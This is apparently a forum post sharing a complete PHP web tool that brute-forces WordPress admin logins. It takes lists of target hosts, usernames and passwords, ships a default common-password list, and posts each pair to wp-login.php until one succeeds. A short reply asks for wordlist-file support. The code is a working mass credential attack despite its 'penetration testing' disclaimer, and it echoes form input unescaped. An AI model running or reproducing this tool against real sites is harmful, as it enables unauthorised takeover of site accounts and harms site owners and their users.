Topic: WordPress admin panel bruteforce

USAGE:
    the first text area is for all websites you wanna check out it’s security.
    the second text area is for the usernames you wanna check out.
    the third text area is for passwords you wanna check.
    then click brute now, and you will get the results synchronously!


<?php
echo "
<!--
Powered By Coderz
www.c0derz.com
Wordpress Admin Panel Penetration Testing
V 1
PS: this tool is for penetration testing and educational purpose, c0derz.com is not responsible at any bad using for this tool.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
-->
";

error_reporting(0);
set_time_limit(0);
ignore_user_abort(true);
?>
<html>
<head>
<title>C0derz.com | WordPress Admin Panel Penetration Testing</title>
<meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>

<style type="text/css">
body {
    color: white;
    background-image: url(http://c0derz.com/wp-content/themes/Polished/images/background.png);
}
textarea {
    border-radius: 8px;
    color: white;
    background-color:black;
}
input[type=submit] , .submit{
        background-color:black;
        color:white;
        border-radius:8px;
}
p {
    font-size: 10px;
    text-align: center;
}
a:link,a:hover,a:visited {
    color:white;
}
</style>
</head>
<!-- C0derz.com | WordPress Admin Panel Penetration Testing -->
<center>
<p><a href="http://www.c0derz.com" target="_blank"><img src="http://c0derz.com/wp-content/themes/Polished/images/logo.png" border="0"/></a></p>
<form enctype="multipart/form-data" method="POST">
  <table width='624' border='0' id='Box'>
    <tr>
<td width='4%'>&nbsp;</td>
<td width="96%" colspan="3" align="center" ><p>C0derz.com | WordPress Admin Panel Penetration Testing </p></td>
</tr>
    <tr>
      <td >&nbsp;</td>
      <td ><p>Hosts:</p></td>
      <td ><p> Users:</p></td>
      <td ><p>Passwords:</p></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
      <td ><textarea name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
      <td ><textarea name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
    </tr>
<tr><td colspan="4"><input type="submit" name="submit" value="Brute Now" class="submit"  />
<?php
if($_POST)
{
    $hosts = trim(filter($_POST['hosts']));
    $passwords = trim(filter($_POST['passwords']));
    $usernames = trim(filter($_POST['usernames']));

    if($passwords && $usernames && $hosts)
    {
        $hosts_explode = explode("\n", $hosts);
        $usernames_explode = explode("\n", $usernames);
        $passwords_explode = explode("\n", $passwords);

        foreach($hosts_explode as $host)
        {
            $host = RemoveLastSlash($host);
            $hacked = 0;
            $host = str_replace(array("http://","https://","www."),"",trim($host));
            $host = "http://".$host;
            $wpAdmin = $host.'/wp-admin/';

            if(!url_exists($host."/wp-login.php"))
            {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}

            foreach($usernames_explode as $username)
            {
                foreach($passwords_explode as $password)
                {
                    $ch   =     curl_init();
                    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
                    curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
                    curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
                    curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
                    curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
                    curl_setopt($ch,CURLOPT_POST,TRUE);
                    curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#38;#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
                    $login    =       curl_exec($ch);

                    if(eregi ("profile.php",$login) )
                    {
                        $hacked = 1;
                        echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
                        ob_flush();flush();break;
                    }
                }
                if($hacked == 1){break;}
            }
            if($hacked == 0)
            {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
        }
    }
    else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
}
?>
</td></tr>
</table></form>

<!-- C0derz.com | WordPress Admin Panel Penetration Testing -->
<p>powered by <a href="http://c0derz.com">c0derz.com</a></p>
</center>
<p>
  <?php
function url_exists($strURL)
{
    $resURL = curl_init();
    curl_setopt($resURL, CURLOPT_URL, $strURL);
    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
    curl_exec ($resURL);
    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
    curl_close ($resURL);
    if ($intReturnCode != 200){return false;}
    else{return true ;}
}
function filter($string)
{
    if(get_magic_quotes_gpc() != 0){return stripslashes($string);    }
    else{return $string;    }
}
function RemoveLastSlash($host)
{
    if(strrpos($host, '/', -1) == strlen($host)-1)
    {return substr($host,0,strrpos($host, '/', -1));}
    else{return $host;}
}
?>
<?php  echo "</p>"; ?>

    Journalisée

Re: WordPress admin panel bruteforce

Now if you could choose a username and password file to use.